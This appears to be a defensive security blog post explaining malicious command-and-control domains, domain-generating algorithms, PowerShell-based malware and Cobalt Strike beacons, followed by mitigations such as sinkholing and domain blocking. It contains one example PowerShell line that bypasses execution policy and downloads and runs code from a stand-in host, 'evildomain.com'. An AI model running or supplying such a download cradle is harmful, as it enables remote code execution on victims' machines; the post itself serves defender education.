Malicious C2 Domains: How to stomp a moving target
It's rare to find single-stage malware that is powerful, tailored, and effective on a particular target. How do attackers retain control of their implants once they're deployed or put multiple stages of malware into action? Enter: the C2 domain. This blog post will cover the conceptual basics and provide some real-world examples of how C2 domains are leveraged by malicious cyber actors across the globe.
What is a C2 domain?
A C2 domain, or a command and control domain, is a website utilized by malicious cyber actors as a communication channel between their infrastructure and a remote victim system. The communication is initiated from the victim endpoint, and is purposely orchestrated that way to obfuscate the call-out with surrounding network traffic (C2 communications are normally carried out via port 80 or port 443) as well as increase the likelihood of success (networks tend to be leniently configured when it comes to HTTP/HTTPS communications initiated internal to the network). The victim endpoint sends the request to the attack infrastructure as a result of already having been compromised, maybe by a phishing attack or other malicious code on the host. The more sophisticated the malware set, the more redundancies are incorporated to ensure that the endpoint can reach out to attacker infrastructure. Some examples include a long list of C2 domains that can provide follow-on commands, programming logic to circumvent security hurdles that may be present in the environment, or use of a domain-generating algorithm (DGA).
What's the purpose of a C2 domain?
In having an open line of communication with the compromised endpoint, the attackers have a lot of leverage. They can fingerprint the host and gather details that would help develop the next stage of attack, download additional malware on the host, and/or leverage the compromised host as a hop point to access higher-value targets within the target network. C2 communications can also serve as a "heartbeat sensor" for the malware already on the endpoint, letting the attackers know that the malware is present and running as expected.
Real World Example: DGAs in malware
From an incident response standpoint, it's intuitive and easy to block a specific domain or IP from being called out to from within a network. Malware developers have made their implants more resilient and implemented domain-generating algorithms (DGA). DGAs allow threat actors to routinely change C2 domains in order to circumvent domain blacklisting. One of the major requirements for an effective DGA is a domain name that is predictable to both sides of the malware communication chain but not predictable to security researchers. The name randomization can be anywhere from random words to a random string of alphanumeric characters and is determined by the programming logic built in by the threat actor.
Real World Example: Powershell-based Malware
Threat actors will leverage Powershell due to the fact that its native on Windows hosts and allows them to conduct reconnaissance as well as laterally move throughout the environment if the proper safeguards aren't enabled. Powershell can also be leveraged to reach out to C2 domains in order to download additional stages of malware.
A common delivery method for the initial ingress to the network is via Microsoft Office documents containing malicious macros. The macros can then run Powershell code on the target host and from there, call out to a domain and deliver information about the target system or downloadadditional malware. Cmdlets like Invoke-Webrequest or Invoke-Expression are commonly found in the scripts used to accomplish these actions.
An example of a Powershell string used for these purposes can be found below:
-NoProfile -ExecutionPolicy Bypass Invoke-Expression(New-Object Net.WebClient).DownloadString('http://evildomain.com/evilfile.png')
Real World Example: Cobalt Strike
Cobalt Strike is a widely-known advanced adversary emulation and penetration toolkit that's also been leveraged for truly nefarious reasons. It has a payload known as the *Covert C2 Beacon* which allows attackers to establish C2 communications from within a target network via either HTTP, HTTPS, or DNS. It has additional features that can be referenced [here](https://www.cobaltstrike.com/help-beacon). This payload uses *malleable C2*, meaning that the attackers can modify the network traffic to better blend in with the surrounding traffic.
Once the session is established, the attacker can attempt a plethora of commands, from general reconnaissance to privilege escalation and lateral movement within the network. More details on those Cobalt Strike features can be found here.
How to Protect Networks from Malicious C2 Activity
There are several solutions that permit network administrators to mitigate the risk of malicious C2 activity taking place in their networks:
- Block the IP or domain at the network firewall: Domains can be sinkholed (redirected to internal infrastructure for analysis purposes) by setting up a DNS server and spoofing the IP address for the domains in question. This allows network administrators or threat researchers to identify which machines are infected and also characterize what the call-out behavior looks like.
- Acquire an advanced firewall solution: Some are able to assess for domains that are a product of a DGA
- Domain registration: Registering a domain would prevent the threat actors from using the domain themselves, however it would also tip them off and notify them that someone has possibly cracked their algorithm.
- Block a top-level domain (TLD): If the top-level domain is unique and uncommon enough (e.g. .xyz), network administrators may choose to block any traffic to them from across their organization.
- Reverse engineer the payload: A more advanced solution that requires reverse engineering expertise is to reverse engineer and breakdown the DGA in order to predict future-generated domains and block them preemptively.
- Domain Generating Algorithms - Why So Effective? (Cisco)
- Principles of Malware Sinkholing (Dark Reading)
- Identifying and Protecting Against DGA Malware (VIPRE Labs)
- Did You Spot Invoke-Expression? (SANS)
- FTCODE: Taking over (a portion of) the botnet (KPN)